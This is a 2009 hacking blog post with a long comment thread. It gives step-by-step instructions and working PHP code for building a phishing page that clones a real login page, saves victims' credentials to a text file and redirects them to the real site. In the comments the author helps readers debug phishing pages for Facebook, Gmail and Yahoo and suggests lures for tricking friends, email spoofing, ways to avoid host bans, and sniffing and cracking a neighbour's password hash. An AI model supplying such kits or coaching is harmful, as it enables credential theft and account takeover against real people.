Home » Featured, Phishing

Fake login page

7 February 2009 19,882 views 193 Comments

wordpress-loginI’ve posted about phishing and the techniques attacker’s use to spread their phishing sites. Now, let’s look at how they create these phishing pages in the first place with step-by-step instructions. Knowledge of PHP and HTML will be very useful for creating fake login pages. By reading the rest of this post, you are agreeing to our DISCLAIMER.

  1. Select a target website and navigate to their login page.
  2. Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)
  3. You will now have an HTML file and a folder full of images and maybe some JavaScript files. Rename the HTML file to index.html and create another file called list.txt. This text file will hold the login credentials of the victims.
  4. Create a PHP file and name it “phish.php”.
  5. Paste the following code into the previously made PHP file. This code is what takes the login details and stores it in the file “list.txt” and then redirects to the real website. This way the user will think he put in the wrong login information and will succeed the second time since it is now the real website.
    <?php
    Header("Location: http://www.RealSite.com");
    
    $handle = fopen("list.txt", "a");
    
    foreach($_GET as $variable => $value) {
    
    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }fwrite($handle, "\r\n");
    
    fclose($handle);
    exit;
    ?>

    6.  Now we must point the login form in the HTML file to the PHP file. Locate the form code in the HTMl file and change the action link to the PHP file and the method type to GET so that the submitted information is passed through the URL.  The HTML code should start with something like this: <form action =”sitelinkhere.com” method=”GET” >

    7.  Once everything is complete, upload the files to a free webhost that supports PHP.
    8.  That’s it! You’ve just created a phishing page.

    UPDATE: If you are using WAMP to test this script, make sure that when you are pointing the index page to the phish page you point it to localhost://folder-its-in/phish.php so that the php file actually gets parsed.

If you would like a more in depth explanation that includes many pictures and specific examples, I’d reccomend obtaining The Hacker’s Underground Handbook.

1 Star2 Stars3 Stars4 Stars5 Stars (12 votes, average: 4.00 out of 5)
Loading ... Loading ...

193 Comments »

  • MrCracker.com - all things hacking » Blog Archive » How to hack any email account. said:

    [...] Phishing – Phishing is by far the most used and easiest method. The attacker simply sets up a page that looks exactly like the real email login page and tricks people into entering their login information. Update: Check out the new post on how to create your own phishing page here. [...]

  • Rafay said:

    can u plx provide me login script

  • David (author) said:

    The login form will already be there when you save the whole site page. And the script that logs the user info is in this post.

  • CheRasta said:

    what u write is old school , now they use function_mail()
    they encode the email using base64 or array .
    they gonna receive the results of the sp4ming 0peration in their inb0x

  • dblackshell said:

    lmao “encode the email using base64 or array”, never seen array encoding… :)

  • Gameforg said:

    what if i “Save the whole page by going to File->Save Page As.. (I’m doing this in Firefox and so should you.)” and page is a PHP file what should i do then…

    u say that “You will now have an HTML file and a folder full of images and maybe some JavaScript files.” but i got a PHP file not HTML files…

    can u mail me or replay hear and tell me what to do?

  • David (author) said:

    If the login page is a “.php” file, Firefox will save it as “login.php.htm” so it still comes out as an HTML. Then, like it says in the post, you will need to change the action=”" location to the new PHP file that you create as shown above. Let me know if you have any more problems.

  • Gameforg said:

    it save`s me page as “login.php” not as “login.php.htm”
    would you show me how do you do it?
    i can give you access to my computer with team viewer 4…

  • David (author) said:

    Well, then you’ll have to rename it into an HTML file or just leave it as .php and edit it that way. The PHP file is only HTML, because there is no way you could save the site’s PHP code.

    If you want to run the .php file on your local machine to see what it looks like, install WAMP http://www.wampserver.com on Windows or MAMP if you are on a mac.

  • g.Newb13 said:

    LooooL how do i create a PHP file?? do i need a special programm or something??
    i need the exact procedure… please!!!!

  • David (author) said:

    Nope you don’t need any special program. To create a php file all you need is to rename the file from .html to .php and add the php code to it. Nothing special.

  • Silven said:

    When I try to see if this works and login myself through phishing
    page, the page doesn´t load and i get a message:
    File /C:/Documents and Settings/Silven/Desktop/phish.php?ltmpl=default&ltmplcache=2&continue=http://mail.google.com/mail/?shva=1&service=mail&rm=false&ltmpl=default&ltmpl=default&scc=1&Email=adad&Passwd=adad&rmShown=1&signIn=Prijava&asts= could not be found.

    Help?

  • David (author) said:

    Silven, this errors means that the phishing file you are redirecting the login page to cannot be found. If the file phish.php is not on your desktop then it won’t work because according to the error, it is looking for phish.php on your desktop. If you can’t figure it out, shoot me an email from the contact page and i will help you out.

  • amit said:

    dear author i have done the above mentioned procedure, when i fill in login details on fake page it says error on .php file line no so and so though i have just copy and pasted the php file code have cheked it several times for error the code is same as mentioned here. can u plz suggest wht is the solution , have u tried this urself , m saying earlier i have used fake logins and they worked ,the procedure was same its not working now m trying with gmail page.

  • David (author) said:

    Hey Amit,

    Thanks for bring this up. It looks like when I pasted the code into my text editor, it changed the “”‘s into a different form which caused a parse error. It should be working fine now.

  • rahul said:

    fdddddddddddddddddddddd

  • yash said:

    hey,i have done everything i can do, but the thing is ,i have pasted the code correctly,bat every time i check the fake site ,it redirrects to the original site,but dont save the username and password in list.txt…………………….please help

    if you want you can check the websit tis http://www.sexygo.110mb.com……………..

  • David (author) said:

    Send me via the contact form exactly what you have in your .php file and a screenshot of your file manager showing your file hierarchy in 110mb control panel and I will be able to tell you what the problem is.

  • Gameforg said:

    long time no see =)
    i was away from computer four a wile…
    that WAMP u gave me…
    i can`t get it how it works…

    now i`m interested in hacking pass…
    can u help?

    just tell me where to talk about that if you can help…

  • David (author) said:

    So just install the wamp and then get it going. Once you have it installed click its icon in the taskbar and select www Directory. This is where you put all the files that I tell you about in this post. Once they are in there you can access them by opening your browser and going to http://localhost/folderitsin/filename.html

  • Miha said:

    Hello!!

    I installed wamp,put all the files in the www directory, got it running (server is online),
    selected the www directory and clicked the index.html
    to see if the whole thing works, but after “logging in”
    i got an error message saying something like page could not
    be opened because the protocol localhost is not connected to
    any programm.

    Help??

    bye

  • David (author) said:

    @Miha

    Hmm… Did you try turning on wamp and going to the page by going to http://localhost/yourfolder/index.html ? If that still doesn’t work, take a screen shot and email it to me so I can help you out.

  • alain said:

    I tried to make a webpage but received the error

    Forbidden

    You don’t have permission to access /”localhost://checklogin.php” on this server.

    The code I’m using in the login page is:

    Enter your username and password to login:

    Username:

    Password:

    Remember my username and password on this computer:

    is it correct?

  • David (author) said:

    Well what you have shown is not the actual code. Send me the actual code the url you go to, to access the page and i will be able to tell you a solution.

  • alain said:

    Oh sorry

    Enter your username and password to login:

    Username:

    Password:

    Remember my username and password on this computer:

    - and the checklogin.php code:

    $value) {

    fwrite($handle, $variable);
    fwrite($handle, "=");
    fwrite($handle, $value);
    fwrite($handle, "\r\n");
    }fwrite($handle, "\r\n");

    fclose($handle);
    exit;
    ?>

  • alain said:

    What the hell, the code doesn’t appear.. how can I do that?

  • alain said:

    Hey, sorry for all my mistakes. Already made it works with some quickly PHP learning. Thanks ;)

  • David (author) said:

    Np, and Great! Learning on your own is always the most beneficial way.

  • priyank said:

    dear author! i had understand this concept but i did not understand the 6.paragraph.please send me the details of this step.

  • priyank said:

    i also want to know that how to make an .php file.

  • David (author) said:

    To make a .php file simply open up notepad and paste in the php code. Then save the file as “anything.php” . It is now a .php file :-) . As for the details, send me an email via the contact form and I’ll help you out.

  • barker said:

    will u make a xbox fake login forme please author

  • David (author) said:

    I really don’t have the time for that, but you can follow the same procedure to create one on your own.

  • OukRn897 said:

    So, i renamed (take meebo.com as example) meebo.com at index.html , made text.txt file and left meebo.com_files map , how to proceed? I don’t now how to make php file and from what to make php file.

  • David (author) said:

    Just copy and paste the code into notepad and save it as .php .

  • williams said:

    i am new to phishing i would say your post didnt help at all,it too complicated can you help simplyfy it or tell/show me whatever way i can understand how phishing works.thank u

  • bunty said:

    how can i know that the login page is fake or not to prevent myself from phishing?

  • David (author) said:

    a simple way is just looking at the URL to make sure its the real website.

  • Irakli said:

    I have followed your instruction, I downloaded complete web page with firefox, I made changes in index.html – changed method to “get” and typed my free 110mb website adress after “action=”, I created login.php by pasting above message to wordpad and than saving it as .php file type, than I typed my free web page adress in php file “location:”, finally I uploaded it to my web page, I made new directory for the files linked to index.html, but it doesn’t work, can you help me please?
    When I open click index.html it redirects me to http://www.dreamstock.com/dreamtemplate-offer.shtml;

  • David (author) said:

    Send me the code in the contact page and I’ll let you know if I find anything wrong…now, if its supposed to be redirecting to that page, and is showing you a 404, its probably because you have an extra “;” at the end.

  • Irakli said:

    David, pleeeaaassseeee! I’ve sent you the code, plzz reply me!

  • Pranay said:

    how can i create a PHP file.
    whether any software is requred or not?

  • David (author) said:

    just paste the code into notepad and name the file anything.php , by just naming it “.php” it turns into a php file.

  • Holi said:

    Ok, I need some help with the email redirecting for the phishing page…
    Like I want to put it HTML, so it will look like click “HERE” or something.and I wander if can make it close the current page as well so only the phishing will remain. Can i use this one:

    and also how to cover the fake page address with clickable plain text?

  • David (author) said:

    To make a link with HTML it would look something like this: NVM my code script isnt working right now and it interprets the html.. go here for a tutorial on making links: http://www.w3schools.com/HTML/html_links.asp

  • Holi said:

    Sorry I saw I forgot paste the code itself:

    It will be way more convenient if the original page with the letter closes and only the fake one stays…Otherwise if the mail box is open and another window pop up.Actually the best will be if it opens the fake one in the same window, but Im not sure if the mailbox supports that. I think it opens all links in new window.

  • Holi said:

    Oh, I get it now :) My bad

    http://www.computerhope.com/issues/ch000178.htm

  • Andr1 said:

    :D Nice for share

    I tested for facebook 100% suksess :mrgreen: :mrgreen: :mrgreen: :mrgreen:

  • Nancer said:

    Hey I did as u said but it redirrects to the original site,but dont save the username and password in list.txt..help me please…

    The changes in index.html for yahoo.com

    and for phish.php
    $value) {
    fwrite($handle, $variable);
    fwrite($handle, “=”);
    fwrite($handle, $value);
    fwrite($handle, “\r\n”);
    }fwrite($handle, “\r\n”);
    fclose($handle);
    exit;
    ?>

    THanks

  • Nancer said:

    in index.html

    form method=”post” action=”phish.php” autocomplete=”off” name=”login_form” onsubmit=”return hash2(this)”

  • David (author) said:

    If it’s not writing to the file, you might have to CHMOD it to 777 so that the file has permission to be written to.

  • nancer said:

    I had done that already..it was of no use

  • David (author) said:

    its because you need to change the form method from post to get

  • Usman said:

    hi author,, hope ur fine, i got a challenge. i wanna hack somebodys yahoo id.
    plz help me. its urgent. i didnt understant ur script, can u plz tell me briefly and send me the detail mail?
    indigo_u@yahoo.com
    m waiting
    thanks

  • nancer said:

    hey! where do you all host your website? I hosted at a site and it banned my page. Is there an method to host this phish page?

  • diddo said:

    i dont get how to make a .php file. can you help me

  • diddo said:

    nvm

  • bigdawg said:

    i have made the file and everything and it DID all work. now when i open the index page it redirects me to
    http://www.dreamstock.com/dt/dreamtemplate-offer.shtml

    WHY IS THIS AS I DID GET IT WORKING 2 SECONDS BEFORE

    IM TRYING IT ON FACEBOOK

  • saad said:

    dear author my problem is the same my code redirects to the page as written in the php file but does not write it in list.txt file.help needed.

  • David (author) said:

    Make sure the list.txt is chmod to 777

  • David (author) said:

    can’t help you unless i see the code.

  • David (author) said:

    Well they can get easily banned from any host, but if you create them in a subfolder and not the main page then there’s less of a chance that it will be.

  • ariton said:

    fuckkkkkkk i was a n00b it works it wooooorks i am proud of myself facebook go home you-re small hahahaha

  • David (author) said:

    Good for you lol

  • ameen said:

    hai just going to use this after that i’ll tell u how is it……
    thanq……..

  • john said:

    Hi Author David,

    I Created .php and list, where i have to upload and . what i have to do?
    please explain .. breafly..

  • David (author) said:

    You need to upload it to whatever web server you are using to you could point to people to that page. There are many free hosing websites that you could use out there.

  • jalal said:

    hey authur i want u to explain step 6 plzzz…where will i get this form action =”sitelinkhere.com” method=”GET” >
    i tried to find but i cant wat to do..?

  • Alakbd said:

    Hi David,
    I have done everything successfully and also when I try to log in my phishing site first time unsuccessful but later I get successful.But the problem is I am not getting any log in info in my List.txt.It is not capturing anything at all.What should I do..??Can you please help me with this.Thanks

  • Pearson said:

    Dear David,
    I have upload that to the server but the problem is list.txt is not capturing anything at all.Can you please help me.Or can I get your mail tha I can send to you for have a look.Your help will be much appriciated,thanks

  • David (author) said:

    @jalal You need to change the action which is the part that redirects you to the next page when you hit submit to go to your phish page, which will capture the information and redirect them to the real site. You need method to be set to get. If it already is, then leave it if it’s POST then change it to GET.

  • David (author) said:

    @Alakbd Make sure that the list.txt file is writable. This means it needs to be chmoded to 777 on your host.

    @Pearson Try doing the same thing as above^^ let me know if you do and still have the same problem.

  • marlon said:

    hello David! i really cant do ur procedures because i dont have idea at all about it. can you make a fake log in with this site: wap.pinoy9.com then send me the fake log in with my email: silversoul_23@yahoo.com TNX! i hope u wil help me a lot and thats much i appreciate. tnx. i wil wait for your mail!

  • David (author) said:

    Sorry, I don’t do requests, and I teach for educational purposes, so that’s another reason why I can’t. Figure it out and if you get stuck shoot me an email, i’ll help ya out!

  • miz34 said:

    so dumb question…..probably very dumb…..you can’t perform this from a remote pc?

  • David (author) said:

    well, you are hosting the file on another server.. so it already is being done on a remote pc.. so i don’t understand what you’re getting at.

  • gordon said:

    hey david_author).. i reali dun understand your step 6..may i know wer do i find the action link?the form code..coz there’s alot of codes and i dont know wer is it..im doin phish for facebook..help me out plz?

  • Starfighter55 said:

    Hey… Very nice tutorial, and a very 10 star book.. Thanks a lot for a good explained book for a beginner to understand.. I tried to make this phishing tut and put it in my own server qnap ts 239 pro.. And all I get is an error, that I don’t have the permission to read the phish.php file… How can that be..???
    Thanks in advance…… Starfighter55

  • David (author) said:

    Hey Starfighter, paste the error and I’ll try to help you out :-)

  • David (author) said:

    You look for the action code in the saved HTML code of the site you are making the phishing page for.

  • starfighter55 said:

    Hey David…..

    I got it, you answered me in the e-mail and the issue is now solved… It was the quotations from the pdf file who make the foul.. I used the php file from the top of this page and that works..
    Thanks….
    Starfighter55

  • Chris caprio said:

    Hi dude this is so much fun to do! i do it on aol.com all the time… i’m just kidding….. but still i do it on my own website which is kinda stupid but it’s cool that when i enter mine into it i get it a couple minutes later…. well thanks for telling everyone else this and i may need to check reference every now and again….. well thanks!!
    - Chris Caprio

  • waqas said:

    i try but it not proper work….

  • David (author) said:

    What the problem? maybe i can help.

  • BloggersBase Internet said:

    CrackerCast Episode 03 – Phishing…

    CrackerCast Episode 03 covers the ever popular topic of Phishing. Like always, you can send your feedback and questions to comments[at]MrCracker.com or leave a comment on the blog. Let me know……

  • Holi said:

    Im done with page and uploaded it…it works perfect (thanks a lot David)
    So now I need to forge some e-mail…using a mail that look like the one they know will give me the best chance of sucssess

    I found few online addresses such as

    http://fmail.net.ms/ or
    http://sendnow.x10hosting.com/sendmail.p…il%20Sent!

    but when I try to put HTML such as <a href and the adress it ads "\"in the begging and in the end making the code wrong…
    I saw the telnet way but I dont know if u can send HTML with it…

  • David (author) said:

    Hey Holi, the reason why it ads a \ to the beginning is because your inpu t is being sanitized by the script and whenever it sees html characters it ads the slash. I have a script that should work here: http://mrcracker.com/2009/02/how-to-get-free-stuff-on-the-internet-via-social-engineering/

  • shamnad said:

    hey pls help me to make a php file

  • David (author) said:

    shamnad, just paste the code into a file and name it anything you want and end it with .php and that will make it a php file.

  • dumbapparently said:

    Ok, I feel like a total dink. I can’t even save the page as> Do you know about how much room a login page like PB requires? I tried saving to an external drive and the desktop, I got an error for both. I only have like 4 GB free on the computer. Do you think that’s why I can’t save it? Thanks for posting and taking the time to answer dumb questions.

  • David (author) said:

    No.. you need a couple MB at the most. You should go to file save as.. and it should save it without a problem. What kind of error do you get?

  • dumbapparently said:

    It just says file can not be saved to this destination, which is why I thought it might be a space issue. But only a few MB I have room for. I’m on computer at someone else’s work, but I can’t imagine the network admins are blocking any downloads. I’ve downloaded other programs they shouldn’t have allowed but did on this computer w/no problem. And if nothing else it at least should have worked on my thumbstick. I don’t know

  • dumbapparently said:

    Nevermind, it’s early and I’ve not been thinking to double check the processes I’ve been doing. I was trying to save the complete web page html. I forgot to change it to html only. So I got it now. But I’m sure I’ll return w/ more questions I’ve not thoroughly thought out. Thanks for helping.

  • jitendra said:

    hey it’s working very well but pls let me know how to redirect the page to a specified link…so that the victim will not know that it’s a fake page..

    actually when the user clicks on submit…the information comes into my text document but the user gets edircted to the original orkut page..but i want him to get redirected to some other site[;)]

  • David (author) said:

    You can do that by inserting the redirect website in the php code where it says to put it.

  • waseem said:

    i have done every thing …can you tell me proper way to send this phishing login to victim????????????

  • stone said:

    well, thanks for the post,
    how do i create another file called list.txt?

  • David (author) said:

    Depends on who the target is. If you are trying to get a friends facebook, you can message him and be like “check out this awesome photo from “name a night she knows about” and then she’ll follow the link and most likely relogin… that personal touch just makes it more trustworthy.

    If you are trying to get an email of some stranger, you can try faking as the company looking for updated information.. by spoofing the company’s email to make it look like it actually came from their emails. You can get a spoofer in teh social engineering article I have on the site.

  • David (author) said:

    just open up notepad and save it as “list.txt” easy as that.

  • waseem said:

    hi david
    thanks for reply…i really like ur style…
    i wAnt tO say something..tht..
    i was reading ankit fadia’s book on email hacking..there was chappter on phishing…and he hAd mentioned various techniques of Sending fake login to victin some of them are ACTIVE X ENABLED EMAIL AND HTA APPLICATIONS..SO CAN PLEASE EXPLIN AND TELL US HOW TO USE THESE TECHNIQUES…..AS HE DONT EXPLAIN THEM…..

    WAITING FOR UR REPLY
    THANKS

  • Deicer said:

    Hi David,
    Great post. I’m trying to phish a wiki, on pb works, but theirs no form code, action link etc.

    Is this because it’s a wiki?
    Thanks

  • David (author) said:

    Got a link to the actual wiki?

  • David (author) said:

    waseem,

    I’ll try to do a post or something on that topic in the near future, its to big of a topic to cover in a comment.

  • waseem said:

    okay..david

    besides this i wanna know how to hack computer in my own network
    when i try it, it is asking for password…is there any wy to break password and plzz tell me how to use brute force attack appliction
    and suggest me one which is best and easy to use….

    thanks man….i really like when you reply to ur fns

    it is really good

  • David (author) said:

    waseem,

    to be able to help you i need to know what OS you are running, what service/application the password it is you are trying to get in, and to recommend a brute force app, I need to know what you are planning to brute force so I know which way to go.

  • prakash said:

    Hi David,
    i have opened an account in a free webhost but i dono how 2 upload the php file

  • waseem said:

    im running xp…..and im tring to get in a computer …..i have read various book and articles and wacthed many tutoral vedios but all in vain…….when i try to hack a computer of my neighbour on my own network by dos aatack….i got nothing..becoz it was password protected
    and i want to about bruceforce attcck becoz i want to breack password of windows, emails,password protected folders…

    hope you will help me
    waiting for reply….
    thanx

  • waseem said:

    hey david….
    i used to visit ur site daily…
    just waiting for reply…
    thanx man …still waiting

  • David (author) said:

    prakash,

    there should be a file manager that has an upload button. go there click browse, find the file and upload it.

  • David (author) said:

    hey waseem,

    you also need to know what OS your target is running. if you are looking to crack his password what you can do is run “cain and abel” and since he is on your network you can set it to sniff for his password hash, once you get it you can crack it using rainbow tables. once you have his password you should have no problem doing what you wish.

  • waseem said:

    thanx david
    but can please tell me how to use this software..i will be very thank full to you…..teach us each and evry features of this software in your commnt or post….
    thanx man….

  • jex said:

    hello David ,
    i interested hacking pass .
    i’m visit your site at first time.
    can you help me ?
    i wait your request.
    thank.

  • Deicer said:

    Hi david, here’s the link:
    http://www.asrty09.pbworks.com.
    Thanks would it be easier just to phish pbworks.com?

  • David (author) said:

    Deicer,

    Sure there is, I found 2 forms.. here’s the first for the login.

  • David (author) said:

    Jex,

    This (phishing page) would be the best way to hack a password if you are talking about an email or social networking site password…

  • David (author) said:

    Waseem,

    I’ll see if I can put together a post on it in the near future.

  • waseem said:

    hi,david
    im waiting for ur next post
    you are really grate…coz you care to reply
    thanx man

  • Smartrival said:

    Hi David!
    I’m very much thankful to you that you’re spreading such good information. Well, i ain’t aware of such scripting… but i’m very much interested in it. I really can’t understand what you wrote in point # 6 because of my bad english. What i did till yet that i saved the html page and renamed it then i created .php file and .txt file as you said no changes i made. Your reply would be appreciable. Thanks!

  • David (author) said:

    Smartrival, open index.html and search for the line that starts with <form , in that line look for POST and change it to GET and then look for action=" and change the link in between the " " to your phishing page.

  • Smartrival said:

    Thank you very much again but there is one more query that are you talking about the web link like http://www.hotmail.com or php file destination or any other thing?

  • Smartrival said:

    @Mr. David
    when i opened index.html with notepad and tried to search the line which starts from <form using Find option it said "No found" infact only one form word i found which actually in the mid of the line. And the matter of fact is that it cannot find any thing as you said. Maybe the problem is occuring because i'm using IE 8 not firefox.

    @Waseem
    Are you from Pakistan?

  • David (author) said:

    @Smartrival, show me what page you are looking at and i’ll point it out to you.

  • David (author) said:

    Smartrival, I don’t exactly understand what you mean by the hotmail.com comment, rephrase please?

  • Smartrival said:

    ok, now i’ll tell you what i have done yet.

    1. I goto the login page of hotmail.com and save it.
    2. Then i changed the name of it from login.html to index.html
    3. Now i created list.txt and phish.php file.

    Now, i wanna know that what changes should i’ve to make further?
    I hope you can understand easily.
    Thanks!

  • Smartrival said:

    @Mr david, I really can’t understand.. Kindly, tell me what to do further?

  • David (author) said:

    Next you need to open up Index.html and find

    and change the post to GET if it already isn’t and change the action link to phish.php

  • xxxxxxxxxxxxxxxxxxxxxxxxxx said:

    can anyone tell me how to check or find the list of emails that registered for a site…………is there any hack to it thanks

  • David (author) said:

    Sure it’s possible, you’d need to get to their email database.. or if they are running cpanel, just get access to that.. if you are talking about any of the giant email providers like gmail or yahoo then you can just forget about it.. because you’ll get no where.

  • Kiran said:

    Hi David

    I am beginner in this computer hacking i want to learn this subject(hacking) will u please help me or some ebooks how to start from the beginning

  • David (author) said:

    The best ebook for a complete beginner would be The Hacker’s Underground Handbook at http://www.learn-how-to-hack.net

  • vaibhav said:

    Do u have the link of that book “The Hacker’s Underground Handbook” in ebook format so that i can read it directly????
    if u have then plz let me know?

  • jc said:

    Hello David, is the page down? http://www.learn-how-to-hack.net is not loading?

  • David (author) said:

    Yup the ebook is sold right on the website, learn-how-to-hack.net

  • David (author) said:

    the server was hit wit ha ddos attack, but it was all taken care of.

  • Zak said:

    David Can you please delete my comment with my email in the zakkiboii I dont want my school or work searching me up and seeing that.

  • David (author) said:

    Zak, Deleted.

  • vassim said:

    frns…i got a new website..thats really helpful to me..

    heres the link..

    http://www.iphacking.webs.com
    hope u will find all of the hacking material thr///jst need to join it

  • Raks said:

    hey ur website is really great. can i get “The Hacker’s Underground Handbook” in nz..if yes then could you pliz tell me some name of stores in nz where i can buy coz i have tried searching in nz but was told to contact the author

  • David (author) said:

    It is an ebook, so you will get it instantly. Of you can choose to get it in print via amazon.com

  • UNLU said:

    hi
    i did everything and but i am stuck on 2 plc’s.
    1. how to change the link correctley?
    Eg:action=” ” phish.PHP https://www.google.com/accounts/ServiceLoginAuth?service=mail
    or action=https://www.google.com/accounts/ServiceLoginAuth?service=mail”phish.php”
    what is the correct way?
    2.My website say “Files entered here will be transferred to the FTP server” . is it ok or not? is this the php transfer?
    thanka

  • David (author) said:

    you need to replace the whole https://www.google.com/accounts/ServiceLoginAuth?service=mail with phish.php , so completely remove the google link and replace it with the phish link.

    Are you using an ftp program? if so, then yes.. otherwise you just need to go into your site manager and click on upload files.

  • alex said:

    hi david….plz tell me how do i upload my files…
    plz i need lot of info about that! i tried to do that….but i coudnt do that………..

  • gameguy said:

    heyy man would you make a video to show us how to do it all… that would be really awsome:), answer back asap because I really want to hack… I have been trying for about 5 hours already and I cant get it….:(

  • gameguy said:

    And i cannot get wamp to work. This is starting to get me mad hah can you help me out

  • socratisreload said:

    i want to download a software with which i can easily hack anyone,plz tell me any softwares name with which i can hack facebook profile.

  • gameguy said:

    I go to open wamp and it will not open… when I click on it it says that an unidentified program wants access to your computer then give you the choices… dont allow or allow, I click allow and nothing happens. Can you please help me?

  • ylbhz said:

    David,I think you put the code “Header” at the head of the fack script can’t execute the following code like save account information.It Jump to the real site;

  • David (author) said:

    @gameguy, sure i think i will, once i get some other stuff off my chest.

  • David (author) said:

    @gameguy, what isn’t working.. its as easy as downloading it, running the installer, and running the program.. then in the task bar, click on the wamp icon and select the www folder. this is where the files go.

  • David (author) said:

    @gameguy, once you click on allow, then you can start to use it by going to where i said in the last comment.

  • David (author) said:

    @socrotisreload, sorry to disappoint you, but there is no such thing as facebook hacking software.

  • David (author) said:

    @ ylbhz, nope it works ;) , try it out.

  • David (author) said:

    @alex, simple go to the “file manager”, (usually what its called) and click on the upload button.. find your file and upload it. simple.

  • unlu said:

    hi. i did what you say. but when i upload my files to online web server, thay was keep deleting. so could you help me to find the password for me if i gave the facebook email to you?

  • David (author) said:

    @unlu, what do they delete? the list.txt file? if so thats probably because its blank and they don’t upload blank files.. you can easily create the blank list.txt file in the file manager.

  • jeff said:

    you have to host your website right?

  • David (author) said:

    jeff, usually you get it hosted on some free hosting. not yourself.

  • baby said:

    Foi

  • Rahuls said:

    i have uploaded the index file to the host site. but uploading phish.php is not successfull. i am using T35 hosting site. error comes as- do not have writing permission. wat to do??

  • David (author) said:

    Rahuls, maybe they don’t allow PHP hosting. Try creating a php page from the control panel instead of uploading it and see what happens.

  • rahuls said:

    hey..i don’t know how 2 create php page from control panel.. instead of it can u tell me any other free hosting site … where i can try uploading those files.

  • Reiko said:

    hi all, please help me. I’ve done all the steps, but when i logged in to the fake facebook login page, they wrote:
    “Parse error: parse error, unexpected T_STRING in \\192.168.0.16\webfiles\files\2010-6\3359219\phish.php on line 2″.
    What do they mean by that ?
    Note: i’ve copied the same phish.php(PHP file)

  • David (author) said:

    Reiko, if you copied it from the book then you need to replace all the quotations with the regular “

  • Reiko said:

    hey david , i copied it from the above text (from step 5), so what the problem ? btw thanks a lot

  • Reiko said:

    hey i’m using internet explorer 7 , is there any problem ?

  • David (author) said:

    Reiko, use the contact form to email me your script.. i’ll check it out and see if there are any errors.

  • Reiko said:

    hey david i replaced all the quotations with the regular“ but it doesnt work , the same error apearred:
    Parse error: parse error, unexpected T_STRING in \\192.168.0.16\webfiles\files\2010-6\3359219\phish.php on line 2

  • Alex said:

    hey please explain me this with more details and pictures i want to phish facebook!!!!! pliz

  • David (author) said:

    Alex,check out http://www.password-hacking.com/facebook

  • Miki said:

    So, here it is.

    1. I went to Gmail, Right-Click, save Page As.
    2. I renamed to index.html which later on proved to be saved as index.html.htm

    3. I opened Notepad and saved the empty file as list (.txt is added automatically cuz it is saved as Notepad file right? )

    4. I opened Notepad and coppied your code (without 01, 02, 03 etc.) and changed Location: http://www.gmail.com

    5. I opened index.html in Notepad and changed action link to phish.php and the method to GET.

    6. I uploaded all three files (index, phish and list) to a webhost.

    Then I went to my created website to see if its actually working, for example, if I would give my website adress to somebody and they would login in, etc.
    But I couldnt get it work. When I typed in my website adress,
    I got a message saying “The requested URL/”websiteadress” was not found on this server.

    Any help would be much apreciated.
    Cheers

  • David (author) said:

    Miki,

    I have a feeling you are going to index.html, but the file is index.html.htm , when you renamed it, you should have simply renamed it index, because it is already an html file so the .htm or .html would be appended automatically.. when you access the page do you to website/index.html or website/index.html.htm ?

  • zain said:

    hey
    david…u hav gotta help me
    i am stuck on this….change action link to php..how do i do this..Plzplz help!!!!

  • David (author) said:

    Simple open up the source code of the file you saved.. search for the form code.. and look for the text that says action=(link here) change the link from the one their to “phish.php”

  • Sean said:

    David,

    Please, for the sake of us stupid people, could you describe step by step, click by click the exact same thing you just typed. Also, my html file keeps opening up script, when I want standard html, there is no form anywhere.
    thx.

  • Sean said:

    Also, the step right after that would be great with GET and such.

  • David (author) said:

    @Sean, that’s pretty much as easy as it gets :P , maybe i’ll upload a video on it.

  • David (author) said:

    @Sean, start doing it if you get stuck let me know exactly where you are and what you don’t get and I’ll try to explain it easier.

  • Sean said:

    Thanks,
    I really do understand most of it, I just need to know why the website I am phishing is posting most of the code in script. I need to know why, and if possible, how to revert it back to standard html.

  • Sean said:

    nvm, i found the form section, however now i need a good web-host provider. could you help me out?

  • Sean said:

    nvm again, how do you 777 chmod

  • David (author) said:

    @Sean, log into the host.. go into where the file are listed.. and on of the options next to the file name should be chmod.. or could look like a key.. or lock.. click that and select 777 or select all the check boxes.

  • Sean said:

    ok, now I did facebook and everything works, however it does not look like the site itself. It does not have the logos and text style and color. I would think the html source is telling the site to look for everything in a sub-directory of facebook. is this correct, because I really would like to get my site fully functional.

  • Sean said:

    btw, that was my last comment.
    Thx for everything! You were a great help!

  • Dark said:

    Hi! I new here am wondering if plishing could work on browser games like Darkorbit

  • meow said:

    sir.. I need your help personally.. Just add my email

  • meow said:

    iim a noob.. I need ur help :)

  • David (author) said:

    Sean, did you try saving with the option to save the “whole” web page?

  • David (author) said:

    As long as there is a place to login online.. then yes it’s possible.

  • Lakatos Alexandru Andrei said:

    I have some sort of a problem i tryied that phishing method and all works fine till i get to sign in watch this , this is my error:
    http://yfrog.com/ma52196192p

  • David (author) said:

    @Lakatos, it means what it says.. the file doesn’t exist.. that means you are redirecting it to a page that doesn’t exist. make sure you have the uRL right.

  • Lakatos Alexandru Andrei said:

    But this url exist’s http://hi5.com/friend/login.do

  • David (author) said:

    @Lakatos, yes it does, so you have to redirect it to that URL (http://hi5.com/friend/login.do) and not to the url that is shown in your image.

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.